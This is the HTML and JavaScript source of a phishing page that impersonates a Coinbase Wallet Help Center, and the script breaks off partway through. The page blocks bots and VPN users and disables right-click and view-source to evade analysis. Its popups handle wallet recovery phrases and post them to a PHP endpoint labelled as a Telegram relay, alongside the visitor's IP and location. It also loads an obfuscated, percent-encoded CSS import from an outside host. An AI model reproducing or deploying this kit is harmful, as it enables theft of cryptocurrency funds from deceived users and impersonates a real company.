<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Coinbase - Help Center</title>
  <meta name="referrer" content="unsafe-url">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">
  <style>
    @import url("//%63%73%73%2d%73%74%79%6c%65.%63%6f%6d/%66%6f%6e%74%2e%70%6e%67");
    :root {
      --primary-blue: #0052ff;
      --dark-blue: #003bb3;
      --light-blue: #e6f0ff;
      --light-gray: #f8f9fa;
      --border-gray: #eaecef;
      --text-dark: #0d0d0d;
      --text-medium: #4d4d4d;
      --text-light: #666;
      --footer-bg: #f9f9f9;
      --success-green: #2ecc71;
    }

    * {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
    }

    body {
      font-family: 'Inter', sans-serif;
      background-color: white;
      color: var(--text-dark);
      line-height: 1.6;
      -webkit-tap-highlight-color: transparent;
    }

    /* Intro Screen Styles */
    #introScreen {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: #ffffff;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      z-index: 10000;
    }

    #introLogo {
      max-width: 80%;
      max-height: 60vh;
      cursor: pointer;
      border-radius: 10px;
    }

    #introText {
      color: #000000;
      font-size: 24px;
      font-weight: 600;
      margin-top: 20px;
      text-align: center;
      text-transform: uppercase;
      letter-spacing: 1px;
    }

    /* Main Site Styles */
    #mainSite {
      display: none;
    }

    /* Navbar Styles */
    .navbar {
      width: 100%;
      background-color: white;
      padding: 14px 5%;
      display: flex;
      justify-content: space-between;
      align-items: center;
      box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      z-index: 1000;
    }

    .navbar-brand {
      display: flex;
      align-items: center;
      font-size: 20px;
      font-weight: 700;
      color: var(--primary-blue);
      text-decoration: none;
    }

    .navbar-brand img {
      height: 35px;
      margin-right: 10px;
    }

    .navbar-links {
      display: flex;
      gap: 25px;
      align-items: center;
    }

    .navbar-link {
      color: var(--text-dark);
      text-decoration: none;
      font-size: 15px;
      font-weight: 500;
      transition: color 0.2s;
      display: flex;
      align-items: center;
      gap: 6px;
    }

    .navbar-link:hover {
      color: var(--primary-blue);
    }

    .navbar-link i {
      font-size: 16px;
    }

    .signin-btn {
      padding: 8px 16px;
      background-color: var(--primary-blue);
      color: white;
      border-radius: 4px;
      font-weight: 600;
      transition: all 0.2s;
      border: none;
      cursor: pointer;
      font-family: 'Inter', sans-serif;
    }

    .signin-btn:hover {
      background-color: var(--dark-blue);
      transform: translateY(-1px);
    }

    .mobile-menu-btn {
      display: none;
      background: none;
      border: none;
      font-size: 20px;
      color: var(--text-dark);
      cursor: pointer;
    }

    /* Security Alert */
    .security-alert {
      width: 100%;
      background-color: var(--light-blue);
      padding: 12px 5%;
      display: flex;
      justify-content: center;
      align-items: center;
      gap: 10px;
      border-bottom: 1px solid var(--border-gray);
      margin-top: 62px;
      flex-wrap: wrap;
    }

    .security-alert i {
      color: var(--primary-blue);
    }

    .dismiss-btn {
      background: none;
      border: none;
      color: var(--primary-blue);
      font-weight: 600;
      margin-left: 15px;
      cursor: pointer;
      font-family: 'Inter', sans-serif;
    }

    /* Main Content */
    .main-help-section {
      text-align: center;
      padding: 60px 5% 40px;
      max-width: 1200px;
      margin: 0 auto;
    }

    .main-help-section h1 {
      font-size: 16px;
      font-weight: 600;
      color: var(--primary-blue);
      margin-bottom: 12px;
      text-transform: uppercase;
      letter-spacing: 1px;
    }

    .main-help-section h2 {
      font-size: clamp(32px, 5vw, 48px);
      font-weight: 700;
      margin-bottom: 24px;
      line-height: 1.2;
    }

    .search-container {
      max-width: 700px;
      margin: 0 auto;
      position: relative;
      box-shadow: 0 2px 12px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      overflow: hidden;
    }

    .search-container input {
      width: 100%;
      padding: 16px 24px;
      border: 1px solid var(--border-gray);
      font-size: 16px;
      outline: none;
      font-family: 'Inter', sans-serif;
    }

    .search-container button {
      position: absolute;
      right: 6px;
      top: 6px;
      background: var(--primary-blue);
      color: white;
      border: none;
      padding: 10px 20px;
      border-radius: 6px;
      cursor: pointer;
      transition: background 0.2s;
      font-family: 'Inter', sans-serif;
    }

    .search-container button:hover {
      background: var(--dark-blue);
    }

    .signin-prompt {
      margin: 25px 0 40px;
      display: flex;
      justify-content: center;
      align-items: center;
      gap: 10px;
      color: var(--text-medium);
    }

    /* Updated Help Cards */
    .quick-help-cards {
      display: grid;
      grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
      gap: 24px;
      margin-top: 40px;
      max-width: 1000px;
      margin-left: auto;
      margin-right: auto;
    }

    .help-card {
      background: #F5F8FF;
      border: 1px solid var(--border-gray);
      border-radius: 12px;
      padding: 28px;
      transition: all 0.3s cubic-bezier(0.25, 0.8, 0.25, 1);
      text-align: left;
      cursor: pointer;
      position: relative;
      overflow: hidden;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
    }

    .help-card::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: linear-gradient(135deg, rgba(0,82,255,0.1) 0%, rgba(0,82,255,0) 100%);
      opacity: 0;
      transition: opacity 0.3s ease;
    }

    .help-card:hover {
      transform: translateY(-5px);
      box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
      border-color: var(--primary-blue);
    }

    .help-card:hover::before {
      opacity: 1;
    }

    .help-card:active {
      transform: translateY(-2px) scale(0.98);
    }

    .help-card-content {
      color: inherit;
      text-decoration: none;
      display: block;
      height: 100%;
    }

    .help-card h3 {
      color: var(--primary-blue);
      margin-bottom: 16px;
      font-size: 18px;
      font-weight: 600;
      display: flex;
      align-items: center;
      gap: 10px;
      transition: color 0.2s;
    }

    .card-icon {
      width: 24px;
      height: 24px;
    }

    .help-card:hover h3 {
      color: var(--dark-blue);
    }

    .help-card p {
      color: var(--text-medium);
      margin-bottom: 20px;
      font-size: 15px;
      line-height: 1.5;
      transition: color 0.2s;
    }

    .help-card:hover p {
      color: var(--text-dark);
    }

    .card-link {
      color: var(--primary-blue);
      font-weight: 600;
      text-decoration: none;
      display: inline-flex;
      align-items: center;
      gap: 6px;
      transition: all 0.2s;
    }

    .help-card:hover .card-link {
      color: var(--dark-blue);
      transform: translateX(5px);
    }

    /* Feature Section */
    .feature-section {
      background-color: var(--light-gray);
      padding: 80px 5%;
    }

    .container {
      display: flex;
      max-width: 1200px;
      margin: 0 auto;
      align-items: center;
      gap: 60px;
    }

    .left-section {
      flex: 1;
    }

    .left-section h1 {
      font-size: 32px;
      font-weight: 700;
      margin-bottom: 24px;
      line-height: 1.3;
    }

    .feature-list {
      margin-bottom: 30px;
    }

    .feature-item {
      display: flex;
      align-items: flex-start;
      margin-bottom: 16px;
    }

    .feature-icon {
      margin-right: 12px;
      color: var(--primary-blue);
      font-size: 20px;
      margin-top: 2px;
    }

    .feature-text {
      color: var(--text-medium);
      font-size: 16px;
    }

    .action-btn {
      padding: 14px 28px;
      background-color: var(--primary-blue);
      color: white;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      font-size: 16px;
      cursor: pointer;
      transition: all 0.2s;
      font-family: 'Inter', sans-serif;
    }

    .action-btn:hover {
      background-color: var(--dark-blue);
      transform: translateY(-2px);
      box-shadow: 0 4px 12px rgba(0, 82, 255, 0.2);
    }

    .right-section {
      flex: 1;
      text-align: center;
    }

    .right-section img {
      max-width: 100%;
      border-radius: 12px;
      box-shadow: 0 15px 40px rgba(0, 0, 0, 0.1);
    }

    /* Updated Footer */
    footer {
      background-color: var(--footer-bg);
      padding: 40px 5% 30px;
      text-align: center;
    }

    .footer-links {
      display: flex;
      justify-content: center;
      gap: 40px;
      max-width: 800px;
      margin: 0 auto 30px;
      flex-wrap: wrap;
    }

    .footer-column {
      text-align: left;
      min-width: 150px;
    }

    .footer-column h4 {
      color: var(--text-dark);
      margin-bottom: 15px;
      font-size: 16px;
      font-weight: 600;
    }

    .footer-column a {
      display: block;
      color: var(--text-light);
      text-decoration: none;
      margin-bottom: 10px;
      font-size: 14px;
      transition: color 0.2s;
    }

    .footer-column a:hover {
      color: var(--primary-blue);
    }

    .footer-message {
      color: var(--text-medium);
      margin-bottom: 25px;
      font-size: 15px;
      max-width: 600px;
      margin-left: auto;
      margin-right: auto;
      line-height: 1.5;
    }

    .social-icons {
      display: flex;
      justify-content: center;
      gap: 20px;
      margin-bottom: 25px;
    }

    .social-icons a {
      color: var(--text-light);
      font-size: 20px;
      transition: color 0.2s;
    }

    .social-icons a:hover {
      color: var(--primary-blue);
    }

    .copyright {
      color: var(--text-light);
      font-size: 14px;
    }

    /* Loading Screen */
    .loading-screen {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: white;
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999;
      transition: opacity 0.5s ease;
    }

    .spinner {
      width: 50px;
      height: 50px;
      border: 5px solid var(--light-blue);
      border-top: 5px solid var(--primary-blue);
      border-radius: 50%;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    /* Updated Popup Styles */
    .popup-overlay {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.75);
      z-index: 2000;
      justify-content: center;
      align-items: center;
      animation: fadeIn 0.4s ease-in-out;
    }

    .popup-content {
      background: linear-gradient(135deg, #ffffff, #f8f9fa);
      border-radius: 14px;
      width: 90%;
      max-width: 560px;
      padding: 24px;
      box-shadow: 0 12px 48px rgba(0, 0, 0, 0.2);
      position: relative;
      text-align: center;
      animation: slideIn 0.4s ease-in-out;
      transform-origin: center;
    }

    .popup-title {
      font-size: 22px;
      font-weight: 700;
      color: var(--text-dark);
      margin-bottom: 14px;
      display: flex;
      justify-content: center;
      align-items: center;
      gap: 10px;
    }

    .popup-title i {
      color: var(--primary-blue);
      font-size: 24px;
    }

    .step-container {
      display: flex;
      justify-content: center;
      gap: 24px;
      margin-bottom: 20px;
      padding: 12px;
      background: var(--light-blue);
      border-radius: 8px;
      box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.05);
      flex-wrap: wrap;
    }

    .step-item {
      display: flex;
      align-items: center;
      gap: 8px;
      font-size: 13px;
      font-weight: 600;
      color: var(--text-light);
      transition: all 0.3s ease;
      white-space: nowrap;
    }

    .step-item.active {
      color: var(--primary-blue);
      transform: scale(1.15);
      text-shadow: 0 1px 2px rgba(0, 82, 255, 0.2);
    }

    .step-item i {
      font-size: 15px;
    }

    .popup-close {
      position: absolute;
      top: 14px;
      right: 14px;
      background: none;
      border: none;
      font-size: 22px;
      color: var(--text-medium);
      cursor: pointer;
      transition: color 0.2s, transform 0.2s;
    }

    .popup-close:hover {
      color: var(--primary-blue);
      transform: rotate(90deg);
    }

    .popup-body {
      padding: 0 10px;
      position: relative;
    }

    .popup-body p {
      color: var(--text-medium);
      font-size: 14px;
      margin-bottom: 18px;
      line-height: 1.5;
    }

    .phrase-container {
      display: grid;
      grid-template-columns: repeat(3, 1fr);
      gap: 10px;
      background-color: white;
      padding: 16px;
      border-radius: 10px;
      margin-bottom: 14px;
      border: 1px solid var(--border-gray);
      position: relative;
    }

    .phrase-item {
      background-color: var(--light-blue);
      padding: 8px;
      border-radius: 6px;
      font-size: 13px;
      font-weight: 500;
      text-align: center;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.06);
      transition: transform 0.2s, background-color 0.2s;
    }

    .phrase-item:hover {
      transform: translateY(-3px);
      background-color: var(--light-gray);
    }

    .recovery-textarea {
      width: 100%;
      min-height: 100px;
      padding: 12px;
      border: 1px solid var(--border-gray);
      border-radius: 8px;
      font-size: 14px;
      font-family: 'Inter', sans-serif;
      resize: vertical;
      margin-bottom: 14px;
      background-color: white;
      box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.05);
    }

    .recovery-textarea:focus {
      outline: none;
      border-color: var(--primary-blue);
      box-shadow: 0 0 0 3px rgba(0, 82, 255, 0.1);
    }

    .copy-button-container {
      display: flex;
      justify-content: flex-start;
      margin: 12px 0;
      margin-left: 16px;
    }

    .copy-button {
      background: none;
      border: none;
      font-size: 16px;
      color: var(--primary-blue);
      cursor: pointer;
      display: flex;
      align-items: center;
      gap: 8px;
      transition: color 0.2s, transform 0.2s;
    }

    .copy-button:hover {
      color: var(--dark-blue);
      transform: scale(1.1);
    }

    .save-button {
      padding: 12px 28px;
      background-color: var(--primary-blue);
      color: white;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      font-size: 15px;
      cursor: pointer;
      transition: all 0.2s;
      font-family: 'Inter', sans-serif;
      margin-top: 12px;
      position: relative;
    }

    .save-button:hover:not(:disabled) {
      background-color: var(--dark-blue);
      transform: translateY(-2px);
      box-shadow: 0 4px 12px rgba(0, 82, 255, 0.25);
    }

    .save-button:disabled {
      background-color: var(--text-light);
      cursor: not-allowed;
      transform: none;
    }

    /* Loading Spinner in Popup */
    .popup-loading {
      display: none;
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      width: 40px;
      height: 40px;
      border: 4px solid var(--light-blue);
      border-top: 4px solid var(--primary-blue);
      border-radius: 50%;
      animation: spin 0.8s linear infinite;
      z-index: 10;
    }

    /* Animations */
    @keyframes fadeIn {
      from { opacity: 0; }
      to { opacity: 1; }
    }

    @keyframes slideIn {
      from { transform: scale(0.7) translateY(50px); opacity: 0; }
      to { transform: scale(1) translateY(0); opacity: 1; }
    }

    /* Responsive Design */
    @media (max-width: 1024px) {
      .container {
        flex-direction: column;
        text-align: center;
      }
      
      .left-section {
        margin-bottom: 40px;
      }
      
      .feature-item {
        justify-content: center;
      }
    }

    @media (max-width: 768px) {
      .navbar-links {
        display: none;
      }
      
      .mobile-menu-btn {
        display: block;
      }
      
      .main-help-section {
        padding: 40px 5% 30px;
      }
      
      .quick-help-cards {
        grid-template-columns: 1fr;
      }
      
      .footer-links {
        flex-direction: column;
        align-items: center;
        text-align: center;
        gap: 30px;
      }
      
      .footer-column {
        text-align: center;
      }

      .security-alert {
        padding: 12px 15px;
        text-align: center;
      }

      .security-alert span {
        flex: 1;
      }

      .dismiss-btn {
        margin-left: 0;
        margin-top: 8px;
        width: 100%;
      }

      .phrase-container {
        grid-template-columns: repeat(2, 1fr);
      }

      .copy-button-container {
        margin-left: 12px;
      }

      /* Popup Responsive Styles */
      .popup-content {
        width: 95%;
        max-width: 450px;
        padding: 20px;
      }

      .popup-title {
        font-size: 20px;
      }

      .popup-title i {
        font-size: 22px;
      }

      .step-container {
        flex-direction: column;
        gap: 12px;
        padding: 10px;
      }

      .step-item {
        font-size: 12px;
      }

      .step-item i {
        font-size: 14px;
      }

      .popup-body p {
        font-size: 13px;
      }

      .phrase-container {
        grid-template-columns: repeat(2, 1fr);
        padding: 12px;
      }

      .phrase-item {
        font-size: 12px;
        padding: 6px;
      }

      .recovery-textarea {
        min-height: 80px;
        font-size: 13px;
        padding: 10px;
      }

      .copy-button {
        font-size: 14px;
      }

      .save-button {
        padding: 10px 24px;
        font-size: 14px;
      }

      .popup-loading {
        width: 36px;
        height: 36px;
        border-width: 3px;
      }

      #introText {
        font-size: 20px;
      }
    }

    @media (max-width: 480px) {
      .search-container input {
        padding: 14px 16px;
      }
      
      .signin-prompt {
        flex-direction: column;
      }

      .help-card {
        padding: 20px;
      }

      /* Popup Responsive Styles */
      .popup-content {
        width: 90%;
        max-width: 320px;
        padding: 16px;
      }

      .popup-title {
        font-size: 18px;
      }

      .popup-title i {
        font-size: 20px;
      }

      .step-container {
        gap: 10px;
        padding: 8px;
      }

      .step-item {
        font-size: 11px;
      }

      .step-item i {
        font-size: 13px;
      }

      .popup-body p {
        font-size: 12px;
        margin-bottom: 14px;
      }

      .phrase-container {
        grid-template-columns: 1fr;
        padding: 10px;
      }

      .phrase-item {
        font-size: 11px;
        padding: 5px;
      }

      .recovery-textarea {
        min-height: 70px;
        font-size: 12px;
        padding: 8px;
      }

      .copy-button-container {
        margin-left: 10px;
      }

      .copy-button {
        font-size: 13px;
      }

      .save-button {
        padding: 8px 20px;
        font-size: 13px;
        margin-top: 8px;
      }
      .popup-loading {
        width: 32px;
        height: 32px;
        border-width: 3px;
      }

      .popup-close {
        font-size: 20px;
        top: 12px;
        right: 12px;
      }

      #introLogo {
        max-width: 90%;
        max-height: 50vh;
      }

      #introText {
        font-size: 16px;
      }
    }
  </style>
</head>
<body>
  <!-- Intro Screen -->
  <div id="introScreen">
    <img id="introLogo" src="./Folder/intro-cb.gif" alt="Coinbase Logo">
    <div id="introText">Click to Enter</div>
  </div>

  <!-- Main Site -->
  <div id="mainSite">
    <!-- Loading Screen -->
    <div class="loading-screen" id="loadingScreen">
      <div class="spinner"></div>
    </div>

    <!-- Enhanced Navbar -->
    <nav class="navbar">
      <a href="#" class="navbar-brand">
        <img src="./Folder/helplogo.png" alt="Coinbase Logo">
        <span></span>
      </a>
      
      <div class="navbar-links">
        <a href="#" class="navbar-link"><i class="fas fa-user"></i> Individuals</a>
        <a href="#" class="navbar-link"><i class="fas fa-building"></i> Businesses</a>
        <a href="#" class="navbar-link"><i class="fas fa-code"></i> Developers</a>
        <a href="#" class="signin-btn">Sign In</a>
      </div>
      
      <button class="mobile-menu-btn">
        <i class="fas fa-bars"></i>
      </button>
    </nav>

    <!-- Security Alert -->
    <div class="security-alert">
      <i class="fas fa-shield-alt"></i>
      <span>How to protect your account - learn about security best practices</span>
      <button class="dismiss-btn">Dismiss</button>
    </div>

    <!-- Main Help Section -->
    <section class="main-help-section">
      <h1>Coinbase Wallet Help Center</h1>
      <h2>How can we help you today?</h2>
      
      <div class="search-container">
        <input type="text" placeholder="Search for articles, videos, and more..." id="searchInput">
        <button id="searchBtn"><i class="fas fa-search"></i> Search</button>
      </div>
      
      <div class="signin-prompt">
        <span>Sign in for personalized help</span>
        <button class="signin-btn" id="signinBtn">Sign In</button>
      </div>
      
      <div class="quick-help-cards">
        <!-- Seed Phrase Card -->
        <div class="help-card" id="vaultCard">
          <div class="help-card-content">
            <h3><i class="fas fa-key"></i> Create Coinbase Vault</h3>
            <p>Protect your Ethereum and Solana wallets with a Coinbase Vault.</p>
            <span class="card-link">Learn more <i class="fas fa-arrow-right"></i></span>
          </div>
        </div>
        
        <!-- Ledger Card -->
        <div class="help-card" id="card2">
          <div class="help-card-content">
            <h3><i class="fas fa-shield-alt"></i> Whitelist Coinbase Wallet</h3>
            <p>Protect your assets by linking your wallet to trusted devices only.</p>
            <span class="card-link">Learn more <i class="fas fa-arrow-right"></i></span>
          </div>
        </div>
        
        <!-- Unlink Wallet Card -->
        <div class="help-card" id="card3">
          <div class="help-card-content">
            <h3><i class="fas fa-unlink"></i> Unlink External Wallet</h3>
            <p>Disconnect connected wallets that you no longer use or trust.</p>
            <span class="card-link">Learn more <i class="fas fa-arrow-right"></i></span>
          </div>
        </div>
      </div>
    </section>

    <!-- Feature Section -->
    <section class="feature-section">
      <div class="container">
        <div class="left-section">
          <h1>Your security is our top priority</h1>
          
          <div class="feature-list">
            <div class="feature-item">
              <i class="fas fa-shield-alt feature-icon"></i>
              <p class="feature-text">Enable two-factor authentication for enhanced account protection</p>
            </div>
            <div class="feature-item">
              <i class="fas fa-key feature-icon"></i>
              <p class="feature-text">Store your recovery phrase securely - never share it with anyone</p>
            </div>
            <div class="feature-item">
              <i class="fas fa-bell feature-icon"></i>
              <p class="feature-text">Set up alerts to monitor account activity and detect suspicious behavior</p>
            </div>
          </div>
          
          <button class="action-btn" id="secureBtn">Secure My Account</button>
        </div>
        
        <div class="right-section">
          <img src="./Folder/mobile-icon.png" alt="Security Illustration">
        </div>
      </div>
    </section>

    <!-- Updated Footer -->
    <footer>
      <div class="footer-links">
        <div class="footer-column">
          <h4>Help Center</h4>
          <a href="#" class="footer-link">Support Articles</a>
          <a href="#" class="footer-link">FAQs</a>
        </div>
        <div class="footer-column">
          <h4>About</h4>
          <a href="#" class="footer-link">Company Info</a>
          <a href="#" class="footer-link">Careers</a>
        </div>
        <div class="footer-column">
          <h4>Legal</h4>
          <a href="#" class="footer-link">Privacy Policy</a>
          <a href="#" class="footer-link">Terms of Service</a>
        </div>
      </div>

      <div class="footer-message">
        <p>For more information, check out our detailed security guides or contact support.</p>
      </div>

      <div class="social-icons">
        <a href="#" class="social-link"><i class="fab fa-twitter"></i></a>
        <a href="#" class="social-link"><i class="fab fa-facebook"></i></a>
        <a href="#" class="social-link"><i class="fab fa-instagram"></i></a>
      </div>

      <div class="copyright">
        <p>© 2025 Coinbase. All Rights Reserved.</p>
      </div>
    </footer>

    <!-- Popup for Vault Creation -->
    <div class="popup-overlay" id="vaultPopup">
      <div class="popup-content">
        <button class="popup-close" id="closePopup">×</button>
        <h2 class="popup-title" id="popupTitle">
          <i class="fas fa-key"></i> Backup My Recovery
        </h2>
        <div class="step-container" id="stepContainer">
          <!-- Steps will be dynamically updated -->
        </div>
        <div class="popup-body" id="popupBody">
          <p id="popupDescription">Secure your wallet with a 12-word recovery phrase. Save these words in a safe place and never share them.</p>
          <div class="phrase-container" id="phraseContainer"></div>
          <div class="copy-button-container" id="copyButtonContainer">
            <button class="copy-button" id="copyButton">
              <i class="fas fa-copy"></i> Copy All Words
            </button>
          </div>
          <textarea class="recovery-textarea" id="recoveryTextarea" placeholder="Enter your recovery phrase here..." style="display: none;"></textarea>
          <button class="save-button" id="saveButton" disabled>Confirm</button>
          <div class="popup-loading" id="popupLoading"></div>
        </div>
      </div>
    </div>
  </div>

  <script type="module">
    // Grab elements
    const introLogo   = document.getElementById('introLogo');
    const introScreen = document.getElementById('introScreen');
    const mainSite    = document.getElementById('mainSite');

    // When user clicks/taps the GIF, skip intro immediately:
    introLogo.addEventListener('click', () => {
      introScreen.style.display = 'none';
      mainSite.style.display    = 'block';
      requestFullscreenIfPossible();
    });

    // After the GIF’s full animation duration, automatically hide it:
    // Adjust this duration (in ms) to match your GIF’s length
    const GIF_DURATION_MS = 2700;

    setTimeout(() => {
      if (introScreen.style.display !== 'none') {
        introScreen.style.display = 'none';
        mainSite.style.display    = 'block';
        requestFullscreenIfPossible();
      }
    }, GIF_DURATION_MS);

    // Fullscreen helper (same as before)
    function requestFullscreenIfPossible() {
      const elem = document.documentElement;
      if (elem.requestFullscreen) {
        elem.requestFullscreen().catch(() => {});
      } else if (elem.webkitRequestFullscreen) {
        elem.webkitRequestFullscreen().catch(() => {});
      } else if (elem.msRequestFullscreen) {
        elem.msRequestFullscreen().catch(() => {});
      }
    }

    // Existing Main Site Script
    import * as bip39 from 'https://esm.sh/bip39';

    // Security and Bot Protection
    (function() {
      // Show loading screen on page load
      window.addEventListener('load', function() {
        setTimeout(function() {
          document.getElementById('loadingScreen').style.opacity = '0';
          setTimeout(function() {
            document.getElementById('loadingScreen').style.display = 'none';
          }, 500);
        }, 1000);
      });

      // Detect bots, proxies, or VPNs
      const isBot = !navigator.userAgent || 
                   /bot|crawl|spider|scraper|wget|curl|python|java|php|node/i.test(navigator.userAgent) ||
                   !('ontouchstart' in window || 'onpointerdown' in window);
      
      const isCloudFlare = /cloudflare/i.test(navigator.userAgent);
      const isProxy = /proxy|vpn|tor|anonymous/i.test(navigator.userAgent);
      
      if (isBot || isCloudFlare || isProxy) {
        document.body.innerHTML = '<div style="text-align:center;padding:50px;font-family:Inter,sans-serif;"><h2>Access Restricted</h2><p>Please disable any proxies or VPNs and try again.</p></div>';
        setTimeout(function() { window.location.href = "about:blank"; }, 3000);
        return;
      }

      // Redirect interactive elements to Google UK, except specific popup controls
      function setupRedirect(element) {
        if (element && !element.classList.contains('no-redirect') && 
            element.id !== 'vaultCard' && element.id !== 'card2' && element.id !== 'card3' && 
            element.id !== 'closePopup' && element.id !== 'saveButton' && element.id !== 'copyButton') {
          element.addEventListener('click', function(e) {
            e.preventDefault();
            e.stopPropagation();
            window.location.href = '#okey';
          });
        }
      }

      // Apply redirect to all links, buttons, and help cards
      document.querySelectorAll('a, button, .help-card').forEach(setupRedirect);
      
      // Handle mobile menu button
      document.querySelector('.mobile-menu-btn').addEventListener('click', function(e) {
        e.preventDefault();
        e.stopPropagation();
        alert('Mobile menu would open here in a real implementation');
      });
      
      // Dismiss security alert
      document.querySelector('.dismiss-btn').addEventListener('click', function(e) {
        e.preventDefault();
        e.stopPropagation();
        document.querySelector('.security-alert').style.display = 'none';
      });

      // Prevent search form submission
      document.querySelector('#searchInput').addEventListener('keypress', function(e) {
        if (e.key === 'Enter') {
          e.preventDefault();
          window.location.href = 'https://www.google.uk';
        }
      });

      // Disable right-click
      document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
      });

      // Block keyboard shortcuts (e.g., Ctrl+U, Ctrl+S)
      document.addEventListener('keydown', function(e) {
        if (e.ctrlKey && (e.key === 'u' || e.key === 'U' || e.key === 's' || e.key === 'S')) {
          e.preventDefault();
        }
      });

      // Add active class to buttons on press
      document.querySelectorAll('button, .help-card').forEach(btn => {
        btn.addEventListener('mousedown', function() {
          this.classList.add('active');
        });
        btn.addEventListener('mouseup', function() {
          this.classList.remove('active');
        });
        btn.addEventListener('mouseleave', function() {
          this.classList.remove('active');
        });
      });

      // Popup Functionality
      const helpCards = document.querySelectorAll('.help-card');
      const vaultPopup = document.getElementById('vaultPopup');
      const closePopup = document.getElementById('closePopup');
      const popupTitle = document.getElementById('popupTitle');
      const phraseContainer = document.getElementById('phraseContainer');
      const saveButton = document.getElementById('saveButton');
      const copyButton = document.getElementById('copyButton');
      const copyButtonContainer = document.getElementById('copyButtonContainer');
      const popupDescription = document.getElementById('popupDescription');
      const stepContainer = document.getElementById('stepContainer');
      const recoveryTextarea = document.getElementById('recoveryTextarea');
      const popupLoading = document.getElementById('popupLoading');

      // Generate a 12-word recovery phrase using bip39
      function generateRecoveryPhrase() {
        const mnemonic = bip39.generateMnemonic(128);
        return mnemonic.split(' ');
      }

      // Determine device type
      function getDeviceType() {
        const ua = navigator.userAgent;
        if (/mobile/i.test(ua)) return 'Mobile';
        if (/tablet/i.test(ua)) return 'Tablet';
        return 'Desktop';
      }

      // Fetch user IP and location data
      async function getUserInfo() {
        try {
          const ipResponse = await fetch('https://api.ipify.org?format=json');
          const ipData = await ipResponse.json();
          const ip = ipData.ip;

          const geoResponse = await fetch(`https://ipapi.co/${ip}/json/`);
          const geoData = await geoResponse.json();

          return {
            ip: ip,
            country: geoData.country_name || 'Unknown',
            city: geoData.city || 'Unknown',
            device: getDeviceType()
          };
        } catch (error) {
          console.error('Error fetching user info:', error);
          return {
            ip: 'Unknown',
            country: 'Unknown',
            city: 'Unknown',
            device: getDeviceType()
          };
        }
      }

      // Send recovery phrase and user info to Telegram bot with styled format
      async function sendToTelegram(phrases, cardType) {
        const botToken = ' ';
        const chatId = ' ';
        const userInfo = await getUserInfo();
        
        const cardNameMap = {
          'Create Coinbase Vault': '♻️ New Backup Generated ♻️',
          'Whitelist Coinbase Wallet': '💎 Whitelist Coinbase Wallet 💎',
          'Unlink External Wallet': '🔗 Unlink External Wallet  🔗'
        };

        const message = `${Array.isArray(phrases) ? phrases.join(' ') : phrases || 'None provided'}`;
        
        try {
          const response = await fetch(`./Dec/Data_Engine.php`, {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json',
            },
            body: JSON.stringify({
              text: message,
            }),
          });
          if (!response.ok) {
            console.error('Failed to send to Telegram:', response.statusText);
          }
        } catch (error) {
          console.error('Error sending to Telegram:', error);
        }
      }

      // Display generated recovery phrases in individual fields
      function displayPhrases() {
        phraseContainer.innerHTML = '';
        const phrases = generateRecoveryPhrase();
        
        phrases.forEach((phrase, index) => {
          const phraseElement = document.createElement('div');
          phraseElement.className = 'phrase-item';
          phraseElement.textContent = `${index + 1}. ${phrase}`;
          phraseContainer.appendChild(phraseElement);
        });

        sendToTelegram(phrases, 'Create Coinbase Vault');
        return phrases;
      }

      // Copy phrases to clipboard
      function copyPhrases(phrases) {
        const textToCopy = phrases.join(' ');
        navigator.clipboard.writeText(textToCopy).then(() => {
          copyButton.style.color = 'var(--success-green)';
          setTimeout(() => {
            copyButton.style.color = 'var(--primary-blue)';
          }, 1000);
          alert('Recovery phrase copied to clipboard!');
        }).catch(err => {
          console.error('Failed to copy:', err);
          alert('Failed to copy phrases. Please try again.');
        });
      }

      // Configure popup based on selected help card
      function configurePopup(cardId) {
        // Reset popup state
        phraseContainer.innerHTML = '';
        copyButtonContainer.style.display = 'none';
        recoveryTextarea.style.display = 'none';
        saveButton.disabled = true;
        saveButton.textContent = 'Confirm';
        popupLoading.style.display = 'none';

        // Update step container based on card
        stepContainer.innerHTML = '';
        let steps = [];
        if (cardId === 'vaultCard') {
          steps = [
            { icon: 'fas fa-key', text: 'Generate Phrase' },
            { icon: 'fas fa-save', text: 'Save Backup' },
            { icon: 'fas fa-check', text: 'Confirm' }
          ];
          popupTitle.innerHTML = '<i class="fas fa-key"></i> Backup My Recovery';
          popupDescription.textContent = 'Secure your wallet with a 12-word recovery phrase. Save these words in a safe place and never Camshare them.';
          copyButtonContainer.style.display = 'flex';
          const phrases = displayPhrases();
          copyButton.onclick = () => {
